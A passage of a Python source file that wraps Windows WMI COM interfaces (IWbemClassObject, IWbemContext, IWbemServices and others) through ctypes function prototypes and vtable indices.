(_Out_, 'strName'),
(_Out_, 'pVal'),
(_Out_, 'pType'),
(_Out_, 'plFlavor'),
)
_Next = prototype(IWbemClassObject_Next_Idx,
'Next',
paramflags)
_Next.errcheck = winapi.RAISE_NON_ZERO_ERR
return_obj, return_obj2, return_obj3, return_obj4 = _Next(self.this,
flags
)
return_obj = winapi.convert_bstr_to_str(return_obj)
return return_obj, return_obj2, return_obj3, return_obj4
def EndEnumeration(self):
prototype = ctypes.WINFUNCTYPE(HRESULT)
paramflags = ()
_EndEnumeration = prototype(IWbemClassObject_EndEnumeration_Idx,
'EndEnumeration',
paramflags)
_EndEnumeration.errcheck = winapi.RAISE_NON_ZERO_ERR
_EndEnumeration(self.this
)
def GetPropertyQualifierSet(self, property_param):
prototype = ctypes.WINFUNCTYPE(HRESULT,
wintypes.LPCWSTR,
ctypes.POINTER(wintypes.LPVOID))
paramflags = ((_In_, 'wszProperty'),
(_Out_, 'ppQualSet'),
)
_GetPropertyQualifierSet = prototype(IWbemClassObject_GetPropertyQualifierSet_Idx,
'GetPropertyQualifierSet',
paramflags)
_GetPropertyQualifierSet.errcheck = winapi.RAISE_NON_ZERO_ERR
return_obj = _GetPropertyQualifierSet(self.this,
property_param
)
try:
return_obj = IWbemQualifierSet(return_obj)
except WindowsError:
return_obj = None
return return_obj
def Clone(self):
prototype = ctypes.WINFUNCTYPE(HRESULT,
ctypes.POINTER(wintypes.LPVOID))
paramflags = ((_Out_, 'ppCopy'),
)
_Clone = prototype(IWbemClassObject_Clone_Idx,
'Clone',
paramflags)
_Clone.errcheck = winapi.RAISE_NON_ZERO_ERR
return_obj = _Clone(self.this
)
try:
return_obj = IWbemClassObject(return_obj)
except WindowsError:
return_obj = None
return return_obj
def GetObjectText(self, flags):
prototype = ctypes.WINFUNCTYPE(HRESULT,
ctypes.c_long,
ctypes.POINTER(BSTR))
paramflags = ((_In_, 'lFlags'),
(_Out_, 'pstrObjectText'),
)
_GetObjectText = prototype(IWbemClassObject_GetObjectText_Idx,
'GetObjectText',
paramflags)
_GetObjectText.errcheck = winapi.RAISE_NON_ZERO_ERR
return_obj = _GetObjectText(self.this,
flags
)
return_obj = winapi.convert_bstr_to_str(return_obj)
return return_obj
def SpawnDerivedClass(self, flags):
prototype = ctypes.WINFUNCTYPE(HRESULT,
ctypes.c_long,
ctypes.POINTER(wintypes.LPVOID))
paramflags = ((_In_, 'lFlags'),
(_Out_, 'ppNewClass'),
)
_SpawnDerivedClass = prototype(IWbemClassObject_SpawnDerivedClass_Idx,
'SpawnDerivedClass',
paramflags)
_SpawnDerivedClass.errcheck = winapi.RAISE_NON_ZERO_ERR
return_obj = _SpawnDerivedClass(self.this,
flags
)
try:
return_obj = IWbemClassObject(return_obj)
except WindowsError:
return_obj = None
return return_obj
def SpawnInstance(self, flags):
prototype = ctypes.WINFUNCTYPE(HRESULT,
ctypes.c_long,
ctypes.POINTER(wintypes.LPVOID))
paramflags = ((_In_, 'lFlags'),
(_Out_, 'ppNewInstance'),
)
_SpawnInstance = prototype(IWbemClassObject_SpawnInstance_Idx,
'SpawnInstance',
paramflags)
_SpawnInstance.errcheck = winapi.RAISE_NON_ZERO_ERR
return_obj = _SpawnInstance(self.this,
flags
)
try:
return_obj = IWbemClassObject(return_obj)
except WindowsError:
return_obj = None
return return_obj
def CompareTo(self, flags, compare_to):
prototype = ctypes.WINFUNCTYPE(HRESULT,
ctypes.c_long,
ctypes.POINTER(IWbemClassObject))
paramflags = ((_In_, 'lFlags'),
(_In_, 'pCompareTo'),
)
_CompareTo = prototype(IWbemClassObject_CompareTo_Idx,
'CompareTo',
paramflags)
_CompareTo.errcheck = winapi.RAISE_NON_ZERO_ERR
_CompareTo(self.this,
flags,
compare_to.this if compare_to else None
)
def GetPropertyOrigin(self, name):
prototype = ctypes.WINFUNCTYPE(HRESULT,
wintypes.LPCWSTR,
ctypes.POINTER(BSTR))
paramflags = ((_In_, 'wszName'),
(_Out_, 'pstrClassName'),
)
_GetPropertyOrigin = prototype(IWbemClassObject_GetPropertyOrigin_Idx,
'GetPropertyOrigin',
paramflags)
_GetPropertyOrigin.errcheck = winapi.RAISE_NON_ZERO_ERR
return_obj = _GetPropertyOrigin(self.this,
name
)
return_obj = winapi.convert_bstr_to_str(return_obj)
return return_obj
def InheritsFrom(self, ancestor):
prototype = ctypes.WINFUNCTYPE(HRESULT,
wintypes.LPCWSTR)
paramflags = ((_In_, 'strAncestor'),
)
_InheritsFrom = prototype(IWbemClassObject_InheritsFrom_Idx,
'InheritsFrom',
paramflags)
_InheritsFrom.errcheck = winapi.RAISE_NON_ZERO_ERR
_InheritsFrom(self.this,
ancestor
)
def GetMethod(self, name, flags):
prototype = ctypes.WINFUNCTYPE(HRESULT,
wintypes.LPCWSTR,
ctypes.c_long,
ctypes.POINTER(wintypes.LPVOID),
ctypes.POINTER(wintypes.LPVOID))
paramflags = ((_In_, 'wszName'),
(_In_, 'lFlags'),
(_Out_, 'ppInSignature'),
(_Out_, 'ppOutSignature'),
)
_GetMethod = prototype(IWbemClassObject_GetMethod_Idx,
'GetMethod',
paramflags)
_GetMethod.errcheck = winapi.RAISE_NON_ZERO_ERR
return_obj, return_obj2 = _GetMethod(self.this,
name,
flags
)
try:
return_obj = IWbemClassObject(return_obj)
except WindowsError:
return_obj = None
try:
return_obj2 = IWbemClassObject(return_obj2)
except WindowsError:
return_obj2 = None
return return_obj, return_obj2
def PutMethod(self, name, flags, in_signature, out_signature):
prototype = ctypes.WINFUNCTYPE(HRESULT,
wintypes.LPCWSTR,
ctypes.c_long,
ctypes.POINTER(IWbemClassObject),
ctypes.POINTER(IWbemClassObject))
paramflags = ((_In_, 'wszName'),
(_In_, 'lFlags'),
(_In_, 'pInSignature'),
(_In_, 'pOutSignature'),
)
_PutMethod = prototype(IWbemClassObject_PutMethod_Idx,
'PutMethod',
paramflags)
_PutMethod.errcheck = winapi.RAISE_NON_ZERO_ERR
_PutMethod(self.this,
name,
flags,
in_signature.this if in_signature else None,
out_signature.this if out_signature else None
)
def DeleteMethod(self, name):
prototype = ctypes.WINFUNCTYPE(HRESULT,
wintypes.LPCWSTR)
paramflags = ((_In_, 'wszName'),
)
_DeleteMethod = prototype(IWbemClassObject_DeleteMethod_Idx,
'DeleteMethod',
paramflags)
_DeleteMethod.errcheck = winapi.RAISE_NON_ZERO_ERR
_DeleteMethod(self.this,
name
)
def BeginMethodEnumeration(self, enum_flags):
prototype = ctypes.WINFUNCTYPE(HRESULT,
ctypes.c_long)
paramflags = ((_In_, 'lEnumFlags'),
)
_BeginMethodEnumeration = prototype(IWbemClassObject_BeginMethodEnumeration_Idx,
'BeginMethodEnumeration',
paramflags)
_BeginMethodEnumeration.errcheck = winapi.RAISE_NON_ZERO_ERR
_BeginMethodEnumeration(self.this,
enum_flags
)
def NextMethod(self, flags):
prototype = ctypes.WINFUNCTYPE(HRESULT,
ctypes.c_long,
ctypes.POINTER(BSTR),
ctypes.POINTER(wintypes.LPVOID),
ctypes.POINTER(wintypes.LPVOID))
paramflags = ((_In_, 'lFlags'),
(_Out_, 'pstrName'),
(_Out_, 'ppInSignature'),
(_Out_, 'ppOutSignature'),
)
_NextMethod = prototype(IWbemClassObject_NextMethod_Idx,
'NextMethod',
paramflags)
_NextMethod.errcheck = winapi.RAISE_NON_ZERO_ERR
return_obj, return_obj2, return_obj3 = _NextMethod(self.this,
flags
)
return_obj = winapi.convert_bstr_to_str(return_obj)
try:
return_obj2 = IWbemClassObject(return_obj2)
except WindowsError:
return_obj2 = None
try:
return_obj3 = IWbemClassObject(return_obj3)
except WindowsError:
return_obj3 = None
return return_obj, return_obj2, return_obj3
def EndMethodEnumeration(self):
prototype = ctypes.WINFUNCTYPE(HRESULT)
paramflags = ()
_EndMethodEnumeration = prototype(IWbemClassObject_EndMethodEnumeration_Idx,
'EndMethodEnumeration',
paramflags)
_EndMethodEnumeration.errcheck = winapi.RAISE_NON_ZERO_ERR
_EndMethodEnumeration(self.this
)
def GetMethodQualifierSet(self, method):
prototype = ctypes.WINFUNCTYPE(HRESULT,
wintypes.LPCWSTR,
ctypes.POINTER(wintypes.LPVOID))
paramflags = ((_In_, 'wszMethod'),
(_Out_, 'ppQualSet'),
)
_GetMethodQualifierSet = prototype(IWbemClassObject_GetMethodQualifierSet_Idx,
'GetMethodQualifierSet',
paramflags)
_GetMethodQualifierSet.errcheck = winapi.RAISE_NON_ZERO_ERR
return_obj = _GetMethodQualifierSet(self.this,
method
)
try:
return_obj = IWbemQualifierSet(return_obj)
except WindowsError:
return_obj = None
return return_obj
def GetMethodOrigin(self, method_name):
prototype = ctypes.WINFUNCTYPE(HRESULT,
wintypes.LPCWSTR,
ctypes.POINTER(BSTR))
paramflags = ((_In_, 'wszMethodName'),
(_Out_, 'pstrClassName'),
)
_GetMethodOrigin = prototype(IWbemClassObject_GetMethodOrigin_Idx,
'GetMethodOrigin',
paramflags)
_GetMethodOrigin.errcheck = winapi.RAISE_NON_ZERO_ERR
return_obj = _GetMethodOrigin(self.this,
method_name
)
return_obj = winapi.convert_bstr_to_str(return_obj)
return return_obj
IEnumWbemClassObject_Reset_Idx = 3
IEnumWbemClassObject_Next_Idx = 4
IEnumWbemClassObject_NextAsync_Idx = 5
IEnumWbemClassObject_Clone_Idx = 6
IEnumWbemClassObject_Skip_Idx = 7
class IEnumWbemClassObject(com.IUnknown):
def Reset(self):
prototype = ctypes.WINFUNCTYPE(HRESULT)
paramflags = ()
_Reset = prototype(IEnumWbemClassObject_Reset_Idx,
'Reset',
paramflags)
_Reset.errcheck = winapi.RAISE_NON_ZERO_ERR
_Reset(self.this
)
def Next(self, timeout):
prototype = ctypes.WINFUNCTYPE(HRESULT,
ctypes.c_long,
wintypes.ULONG,
ctypes.POINTER(wintypes.LPVOID),
ctypes.POINTER(wintypes.ULONG))
paramflags = ((_In_, 'lTimeout'),
(_In_, 'uCount'),
(_Out_, 'apObjects'),
(_Out_, 'puReturned'),
)
_Next = prototype(IEnumWbemClassObject_Next_Idx,
'Next',
paramflags)
_Next.errcheck = winapi.RAISE_NON_ZERO_ERR
return_obj, return_obj2 = _Next(self.this,
timeout,
1
)
try:
return_obj = IWbemClassObject(return_obj)
except WindowsError:
return_obj = None
return return_obj
def NextAsync(self, count, sink):
prototype = ctypes.WINFUNCTYPE(HRESULT,
wintypes.ULONG,
ctypes.POINTER(IWbemObjectSink))
paramflags = ((_In_, 'uCount'),
(_In_, 'pSink'),
)
_NextAsync = prototype(IEnumWbemClassObject_NextAsync_Idx,
'NextAsync',
paramflags)
_NextAsync.errcheck = winapi.RAISE_NON_ZERO_ERR
_NextAsync(self.this,
count,
sink.this if sink else None
)
def Clone(self):
prototype = ctypes.WINFUNCTYPE(HRESULT,
ctypes.POINTER(wintypes.LPVOID))
paramflags = ((_Out_, 'ppEnum'),
)
_Clone = prototype(IEnumWbemClassObject_Clone_Idx,
'Clone',
paramflags)
_Clone.errcheck = winapi.RAISE_NON_ZERO_ERR
return_obj = _Clone(self.this
)
try:
return_obj = IEnumWbemClassObject(return_obj)
except WindowsError:
return_obj = None
return return_obj
def Skip(self, timeout, count):
prototype = ctypes.WINFUNCTYPE(HRESULT,
ctypes.c_long,
wintypes.ULONG)
paramflags = ((_In_, 'lTimeout'),
(_In_, 'nCount'),
)
_Skip = prototype(IEnumWbemClassObject_Skip_Idx,
'Skip',
paramflags)
_Skip.errcheck = winapi.RAISE_NON_ZERO_ERR
_Skip(self.this,
timeout,
count
)
IWbemCallResult_GetResultObject_Idx = 3
IWbemCallResult_GetResultString_Idx = 4
IWbemCallResult_GetResultServices_Idx = 5
IWbemCallResult_GetCallStatus_Idx = 6
class IWbemCallResult(com.IUnknown):
def GetResultObject(self, timeout):
prototype = ctypes.WINFUNCTYPE(HRESULT,
ctypes.c_long,
ctypes.POINTER(wintypes.LPVOID))
paramflags = ((_In_, 'lTimeout'),
(_Out_, 'ppResultObject'),
)
_GetResultObject = prototype(IWbemCallResult_GetResultObject_Idx,
'GetResultObject',
paramflags)
_GetResultObject.errcheck = winapi.RAISE_NON_ZERO_ERR
return_obj = _GetResultObject(self.this,
timeout
)
try:
return_obj = IWbemClassObject(return_obj)
except WindowsError:
return_obj = None
return return_obj
def GetResultString(self, timeout):
prototype = ctypes.WINFUNCTYPE(HRESULT,
ctypes.c_long,
ctypes.POINTER(BSTR))
paramflags = ((_In_, 'lTimeout'),
(_Out_, 'pstrResultString'),
)
_GetResultString = prototype(IWbemCallResult_GetResultString_Idx,
'GetResultString',
paramflags)
_GetResultString.errcheck = winapi.RAISE_NON_ZERO_ERR
return_obj = _GetResultString(self.this,
timeout
)
return_obj = winapi.convert_bstr_to_str(return_obj)
return return_obj
def GetResultServices(self, timeout):
prototype = ctypes.WINFUNCTYPE(HRESULT,
ctypes.c_long,
ctypes.POINTER(wintypes.LPVOID))
paramflags = ((_In_, 'lTimeout'),
(_Out_, 'ppServices'),
)
_GetResultServices = prototype(IWbemCallResult_GetResultServices_Idx,
'GetResultServices',
paramflags)
_GetResultServices.errcheck = winapi.RAISE_NON_ZERO_ERR
return_obj = _GetResultServices(self.this,
timeout
)
try:
return_obj = IWbemServices(return_obj)
except WindowsError:
return_obj = None
return return_obj
def GetCallStatus(self, timeout):
prototype = ctypes.WINFUNCTYPE(HRESULT,
ctypes.c_long,
ctypes.POINTER(ctypes.c_long))
paramflags = ((_In_, 'lTimeout'),
(_Out_, 'plStatus'),
)
_GetCallStatus = prototype(IWbemCallResult_GetCallStatus_Idx,
'GetCallStatus',
paramflags)
_GetCallStatus.errcheck = winapi.RAISE_NON_ZERO_ERR
return_obj = _GetCallStatus(self.this,
timeout
)
return return_obj
IWbemContext_Clone_Idx = 3
IWbemContext_GetNames_Idx = 4
IWbemContext_BeginEnumeration_Idx = 5
IWbemContext_Next_Idx = 6
IWbemContext_EndEnumeration_Idx = 7
IWbemContext_SetValue_Idx = 8
IWbemContext_GetValue_Idx = 9
IWbemContext_DeleteValue_Idx = 10
IWbemContext_DeleteAll_Idx = 11
class IWbemContext(com.IUnknown):
def Clone(self):
prototype = ctypes.WINFUNCTYPE(HRESULT,
ctypes.POINTER(wintypes.LPVOID))
paramflags = ((_Out_, 'ppNewCopy'),
)
_Clone = prototype(IWbemContext_Clone_Idx,
'Clone',
paramflags)
_Clone.errcheck = winapi.RAISE_NON_ZERO_ERR
return_obj = _Clone(self.this
)
try:
return_obj = IWbemContext(return_obj)
except WindowsError:
return_obj = None
return return_obj
def GetNames(self, flags):
prototype = ctypes.WINFUNCTYPE(HRESULT,
ctypes.c_long,
ctypes.POINTER(wintypes.LPVOID))
paramflags = ((_In_, 'lFlags'),
(_Out_, 'pNames'),
)
_GetNames = prototype(IWbemContext_GetNames_Idx,
'GetNames',
paramflags)
_GetNames.errcheck = winapi.RAISE_NON_ZERO_ERR
return_obj = _GetNames(self.this,
flags
)
return_obj = ctypes.cast(wintypes.LPVOID(return_obj), ctypes.POINTER(winapi.SAFEARRAY))
return return_obj
def BeginEnumeration(self, flags):
prototype = ctypes.WINFUNCTYPE(HRESULT,
ctypes.c_long)
paramflags = ((_In_, 'lFlags'),
)
_BeginEnumeration = prototype(IWbemContext_BeginEnumeration_Idx,
'BeginEnumeration',
paramflags)
_BeginEnumeration.errcheck = winapi.RAISE_NON_ZERO_ERR
_BeginEnumeration(self.this,
flags
)
def Next(self, flags):
prototype = ctypes.WINFUNCTYPE(HRESULT,
ctypes.c_long,
ctypes.POINTER(BSTR),
ctypes.POINTER(winapi.VARIANT))
paramflags = ((_In_, 'lFlags'),
(_Out_, 'pstrName'),
(_Out_, 'pValue'),
)
_Next = prototype(IWbemContext_Next_Idx,
'Next',
paramflags)
_Next.errcheck = winapi.RAISE_NON_ZERO_ERR
return_obj, return_obj2 = _Next(self.this,
flags
)
return_obj = winapi.convert_bstr_to_str(return_obj)
return return_obj, return_obj2
def EndEnumeration(self):
prototype = ctypes.WINFUNCTYPE(HRESULT)
paramflags = ()
_EndEnumeration = prototype(IWbemContext_EndEnumeration_Idx,
'EndEnumeration',
paramflags)
_EndEnumeration.errcheck = winapi.RAISE_NON_ZERO_ERR
_EndEnumeration(self.this
)
def SetValue(self, name, flags, value):
prototype = ctypes.WINFUNCTYPE(HRESULT,
wintypes.LPCWSTR,
ctypes.c_long,
ctypes.POINTER(winapi.VARIANT))
paramflags = ((_In_, 'wszName'),
(_In_, 'lFlags'),
(_In_, 'pValue'),
)
_SetValue = prototype(IWbemContext_SetValue_Idx,
'SetValue',
paramflags)
_SetValue.errcheck = winapi.RAISE_NON_ZERO_ERR
_SetValue(self.this,
name,
flags,
ctypes.byref(value) if value else None
)
def GetValue(self, name, flags):
prototype = ctypes.WINFUNCTYPE(HRESULT,
wintypes.LPCWSTR,
ctypes.c_long,
ctypes.POINTER(winapi.VARIANT))
paramflags = ((_In_, 'wszName'),
(_In_, 'lFlags'),
(_Out_, 'pValue'),
)
_GetValue = prototype(IWbemContext_GetValue_Idx,
'GetValue',
paramflags)
_GetValue.errcheck = winapi.RAISE_NON_ZERO_ERR
return_obj = _GetValue(self.this,
name,
flags
)
return return_obj
def DeleteValue(self, name, flags):
prototype = ctypes.WINFUNCTYPE(HRESULT,
wintypes.LPCWSTR,
ctypes.c_long)
paramflags = ((_In_, 'wszName'),
(_In_, 'lFlags'),
)
_DeleteValue = prototype(IWbemContext_DeleteValue_Idx,
'DeleteValue',
paramflags)
_DeleteValue.errcheck = winapi.RAISE_NON_ZERO_ERR
_DeleteValue(self.this,
name,
flags
)
def DeleteAll(self):
prototype = ctypes.WINFUNCTYPE(HRESULT)
paramflags = ()
_DeleteAll = prototype(IWbemContext_DeleteAll_Idx,
'DeleteAll',
paramflags)
_DeleteAll.errcheck = winapi.RAISE_NON_ZERO_ERR
_DeleteAll(self.this
)
IWbemServices_OpenNamespace_Idx = 3
IWbemServices_CancelAsyncCall_Idx = 4
IWbemServices_QueryObjectSink_Idx = 5
IWbemServices_GetObject_Idx = 6
IWbemServices_GetObjectAsync_Idx = 7
IWbemServices_PutClass_Idx = 8
IWbemServices_PutClassAsync_Idx = 9
IWbemServices_DeleteClass_Idx = 10
IWbemServices_DeleteClassAsync_Idx = 11
IWbemServices_CreateClassEnum_Idx = 12
IWbemServices_CreateClassEnumAsync_Idx = 13
IWbemServices_PutInstance_Idx = 14
IWbemServices_PutInstanceAsync_Idx = 15
IWbemServices_DeleteInstance_Idx = 16
IWbemServices_DeleteInstanceAsync_Idx = 17
IWbemServices_CreateInstanceEnum_Idx = 18
IWbemServices_CreateInstanceEnumAsync_Idx = 19
IWbemServices_ExecQuery_Idx = 20
IWbemServices_ExecQueryAsync_Idx = 21
IWbemServices_ExecNotificationQuery_Idx = 22
IWbemServices_ExecNotificationQueryAsync_Idx = 23
IWbemServices_ExecMethod_Idx = 24
IWbemServices_ExecMethodAsync_Idx = 25
class IWbemServices(com.IUnknown):
def OpenNamespaceWithResult(self, namespace, flags, ctx):
prototype = ctypes.WINFUNCTYPE(HRESULT,
BSTR,
ctypes.c_long,
ctypes.POINTER(IWbemContext),
ctypes.POINTER(wintypes.LPVOID),
ctypes.POINTER(wintypes.LPVOID))
paramflags = ((_In_, 'strNamespace'),
(_In_, 'lFlags'),
(_In_, 'pCtx'),
(_Out_, 'ppWorkingNamespace'),
(_Out_, 'ppResult'),
)
_OpenNamespace = prototype(IWbemServices_OpenNamespace_Idx,
'OpenNamespace',
paramflags)
_OpenNamespace.errcheck = winapi.RAISE_NON_ZERO_ERR
namespace_bstr = winapi.SysAllocString(namespace) if namespace is not None else None
try:
return_obj, return_obj2 = _OpenNamespace(self.this,
namespace_bstr,
flags,
ctx.this if ctx else None
)
finally:
if namespace_bstr is not None:
winapi.SysFreeString(namespace_bstr)
try:
return_obj = IWbemServices(return_obj)
except WindowsError:
return_obj = None
try:
return_obj2 = IWbemCallResult(return_obj2)
except WindowsError:
return_obj2 = None
return return_obj, return_obj2
def OpenNamespace(self, namespace, flags, ctx):
return_obj, return_obj2 = self.OpenNamespaceWithResult(namespace, flags, ctx)
if return_obj2:
return_obj2.Release()
return return_obj
def CancelAsyncCall(self, sink):
prototype = ctypes.WINFUNCTYPE(HRESULT,
ctypes.POINTER(IWbemObjectSink))
paramflags = ((_In_, 'pSink'),
)
_CancelAsyncCall = prototype(IWbemServices_CancelAsyncCall_Idx,
'CancelAsyncCall',
paramflags)
_CancelAsyncCall.errcheck = winapi.RAISE_NON_ZERO_ERR
_CancelAsyncCall(self.this,
sink.this if sink else None
)
def QueryObjectSink(self, flags):
prototype = ctypes.WINFUNCTYPE(HRESULT,
ctypes.c_long,
ctypes.POINTER(wintypes.LPVOID))
paramflags = ((_In_, 'lFlags'),
(_Out_, 'ppResponseHandler'),
)
_QueryObjectSink = prototype(IWbemServices_QueryObjectSink_Idx,
'QueryObjectSink',
paramflags)
_QueryObjectSink.errcheck = winapi.RAISE_NON_ZERO_ERR
return_obj = _QueryObjectSink(self.this,
flags
)
try:
return_obj = IWbemObjectSink(return_obj)
except WindowsError:
return_obj = None
return return_obj
def GetObjectWithResult(self, object_path, flags, ctx):
prototype = ctypes.WINFUNCTYPE(HRESULT,
BSTR,
ctypes.c_long,
ctypes.POINTER(IWbemContext),
ctypes.POINTER(wintypes.LPVOID),
ctypes.POINTER(wintypes.LPVOID))
paramflags = ((_In_, 'strObjectPath'),
(_In_, 'lFlags'),
(_In_, 'pCtx'),
(_Out_, 'ppObject'),
(_Out_, 'ppCallResult'),
)
_GetObject = prototype(IWbemServices_GetObject_Idx,
'GetObject',
paramflags)
_GetObject.errcheck = winapi.RAISE_NON_ZERO_ERR
object_path_bstr = winapi.SysAllocString(object_path) if object_path is not None else None
try:
return_obj, return_obj2 = _GetObject(self.this,
object_path_bstr,
flags,
ctx.this if ctx else None
)
finally:
if object_path_bstr is not None:
winapi.SysFreeString(object_path_bstr)
try:
return_obj = IWbemClassObject(return_obj)
except WindowsError:
return_obj = None
try:
return_obj2 = IWbemCallResult(return_obj2)
except WindowsError:
return_obj2 = None
return return_obj, return_obj2
def GetObject(self, object_path, flags, ctx):
return_obj, return_obj2 = self.GetObjectWithResult(object_path, flags, ctx)
if return_obj2:
return_obj2.Release()
return return_obj
def GetObjectAsync(self, object_path, flags, ctx, response_handler):
prototype = ctypes.WINFUNCTYPE(HRESULT,
BSTR,
ctypes.c_long,
ctypes.POINTER(IWbemContext),
ctypes.POINTER(IWbemObjectSink))
paramflags = ((_In_, 'strObjectPath'),
(_In_, 'lFlags'),
(_In_, 'pCtx'),
(_In_, 'pResponseHandler'),
)
_GetObjectAsync = prototype(IWbemServices_GetObjectAsync_Idx,
'GetObjectAsync',
paramflags)
_GetObjectAsync.errcheck = winapi.RAISE_NON_ZERO_ERR
object_path_bstr = winapi.SysAllocString(object_path) if object_path is not None else None
try:
_GetObjectAsync(self.this,
object_path_bstr,
flags,
ctx.this if ctx else None,
response_handler.this if response_handler else None
)
finally:
if object_path_bstr is not None:
winapi.SysFreeString(object_path_bstr)
def PutClassWithResult(self, object_param, flags, ctx):
prototype = ctypes.WINFUNCTYPE(HRESULT,
ctypes.POINTER(IWbemClassObject),
ctypes.c_long,
ctypes.POINTER(IWbemContext),
ctypes.POINTER(wintypes.LPVOID))
paramflags = ((_In_, 'pObject'),
(_In_, 'lFlags'),
(_In_, 'pCtx'),
(_Out_, 'ppCallResult'),
)
_PutClass = prototype(IWbemServices_PutClass_Idx,
'PutClass',
paramflags)
_PutClass.errcheck = winapi.RAISE_NON_ZERO_ERR
return_obj = _PutClass(self.this,
object_param.this if object_param else None,
flags,
ctx.this if ctx else None
)
try:
return_obj = IWbemCallResult(return_obj)
except WindowsError:
return_obj = None
return return_obj
def PutClass(self, object_param, flags, ctx):
return_obj = self.PutClassWithResult(object_param, flags, ctx)
if return_obj:
return_obj.Release()
def PutClassAsync(self, object_param, flags, ctx, response_handler):
prototype = ctypes.WINFUNCTYPE(HRESULT,
ctypes.POINTER(IWbemClassObject),
ctypes.c_long,
ctypes.POINTER(IWbemContext),
ctypes.POINTER(IWbemObjectSink))
paramflags = ((_In_, 'pObject'),
(_In_, 'lFlags'),
(_In_, 'pCtx'),
(_In_, 'pResponseHandler'),
)
_PutClassAsync = prototype(IWbemServices_PutClassAsync_Idx,
'PutClassAsync',
paramflags)
_PutClassAsync.errcheck = winapi.RAISE_NON_ZERO_ERR
_PutClassAsync(self.this,
object_param.this if object_param else None,
flags,
ctx.this if ctx else None,
response_handler.this if response_handler else None
)
def DeleteClassWithResult(self, class_param, flags, ctx):
prototype = ctypes.WINFUNCTYPE(HRESULT,
BSTR,
ctypes.c_long,
ctypes.POINTER(IWbemContext),
ctypes.POINTER(wintypes.LPVOID))
paramflags = ((_In_, 'strClass'),
(_In_, 'lFlags'),
(_In_, 'pCtx'),
(_Out_, 'ppCallResult'),
)
_DeleteClass = prototype(IWbemServices_DeleteClass_Idx,
'DeleteClass',
paramflags)
_DeleteClass.errcheck = winapi.RAISE_NON_ZERO_ERR
class_param_bstr = winapi.SysAllocString(class_param) if class_param is not None else None
try:
return_obj = _DeleteClass(self.this,
class_param_bstr,
flags,
ctx.this if ctx else None
)
finally:
if class_param_bstr is not None:
winapi.SysFreeString(class_param_bstr)
try:
return_obj = IWbemCallResult(return_obj)
except WindowsError:
return_obj = None
return return_obj
def DeleteClass(self, class_param, flags, ctx):
return_obj = self.DeleteClassWithResult(class_param, flags, ctx)
if return_obj:
return_obj.Release()
def DeleteClassAsync(self, class_param, flags, ctx, response_handler):
prototype = ctypes.WINFUNCTYPE(HRESULT,
BSTR,
ctypes.c_long,
ctypes.POINTER(IWbemContext),
ctypes.POINTER(IWbemObjectSink))
paramflags = ((_In_, 'strClass'),
(_In_, 'lFlags'),
(_In_, 'pCtx'),
(_In_, 'pResponseHandler'),
)
_DeleteClassAsync = prototype(IWbemServices_DeleteClassAsync_Idx,
'DeleteClassAsync',
paramflags)
_DeleteClassAsync.errcheck = winapi.RAISE_NON_ZERO_ERR
class_param_bstr = winapi.SysAllocString(class_param) if class_param is not None else None
try:
_DeleteClassAsync(self.this,
class_param_bstr,
flags,
ctx.this if ctx else None,
response_handler.this if response_handler else None
)
finally:
if class_param_bstr is not None:
winapi.SysFreeString(class_param_bstr)
def CreateClassEnum(self, superclass, flags, ctx):
prototype = ctypes.WINFUNCTYPE(HRESULT,
BSTR,
ctypes.c_long,
ctypes.POINTER(IWbemContext),
ctypes.POINTER(wintypes.LPVOID))
paramflags = ((_In_, 'strSuperclass'),
(_In_, 'lFlags'),
(_In_, 'pCtx'),
(_Out_, 'ppEnum'),
)
_CreateClassEnum = prototype(IWbemServices_CreateClassEnum_Idx,
'CreateClassEnum',
paramflags)
_CreateClassEnum.errcheck = winapi.RAISE_NON_ZERO_ERR
superclass_bstr = winapi.SysAllocString(superclass) if superclass is not None else None
try:
return_obj = _CreateClassEnum(self.this,
superclass_bstr,
flags,
ctx.this if ctx else None
)
finally:
if superclass_bstr is not None:
winapi.SysFreeString(superclass_bstr)
try:
return_obj = IEnumWbemClassObject(return_obj)
except WindowsError:
return_obj = None
return return_obj
def CreateClassEnumAsync(self, superclass, flags, ctx, response_handler):
prototype = ctypes.WINFUNCTYPE(HRESULT,
BSTR,
ctypes.c_long,
ctypes.POINTER(IWbemContext),
ctypes.POINTER(IWbemObjectSink))
paramflags = ((_In_, 'strSuperclass'),
(_In_, 'lFlags'),
(_In_, 'pCtx'),
(_In_, 'pResponseHandler'),
)
_CreateClassEnumAsync = prototype(IWbemServices_CreateClassEnumAsync_Idx,
'CreateClassEnumAsync',
paramflags)
_CreateClassEnumAsync.errcheck = winapi.RAISE_NON_ZERO_ERR
superclass_bstr = winapi.SysAllocString(superclass) if superclass is not None else None
try:
_CreateClassEnumAsync(self.this,
superclass_bstr,
flags,
ctx.this if ctx else None,
response_handler.this if response_handler else None
)
finally:
if superclass_bstr is not None:
winapi.SysFreeString(superclass_bstr)
def PutInstanceWithResult(self, inst, flags, ctx):
prototype = ctypes.WINFUNCTYPE(HRESULT,
ctypes.POINTER(IWbemClassObject),
ctypes.c_long,
ctypes.POINTER(IWbemContext),
ctypes.POINTER(wintypes.LPVOID))
paramflags = ((_In_, 'pInst'),
(_In_, 'lFlags'),
(_In_, 'pCtx'),
(_Out_, 'ppCallResult'),
)
_PutInstance = prototype(IWbemServices_PutInstance_Idx,
'PutInstance',
paramflags)
_PutInstance.errcheck = winapi.RAISE_NON_ZERO_ERR
return_obj = _PutInstance(self.this,
inst.this if inst else None,
flags,
ctx.this if ctx else None
)
try:
return_obj = IWbemCallResult(return_obj)
except WindowsError:
return_obj = None
return return_obj
def PutInstance(self, inst, flags, ctx):
return_obj = self.PutInstanceWithResult(inst, flags, ctx)
if return_obj:
return_obj.Release()
def PutInstanceAsync(self, inst, flags, ctx, response_handler):
prototype = ctypes.WINFUNCTYPE(HRESULT,
ctypes.POINTER(IWbemClassObject),
ctypes.c_long,
ctypes.POINTER(IWbemContext),
ctypes.POINTER(IWbemObjectSink))
paramflags = ((_In_, 'pInst'),
(_In_, 'lFlags'),
(_In_, 'pCtx'),
(_In_, 'pResponseHandler'),
)
_PutInstanceAsync = prototype(IWbemServices_PutInstanceAsync_Idx,
'PutInstanceAsync',
paramflags)
_PutInstanceAsync.errcheck = winapi.RAISE_NON_ZERO_ERR
_PutInstanceAsync(self.this,
inst.this if inst else None,
flags,
ctx.this if ctx else None,
response_handler.this if response_handler else None
)
def DeleteInstanceWithResult(self, object_path, flags, ctx):
prototype = ctypes.WINFUNCTYPE(HRESULT,
BSTR,
ctypes.c_long,
ctypes.POINTER(IWbemContext),
ctypes.POINTER(wintypes.LPVOID))
paramflags = ((_In_, 'strObjectPath'),
(_In_, 'lFlags'),
(_In_, 'pCtx'),
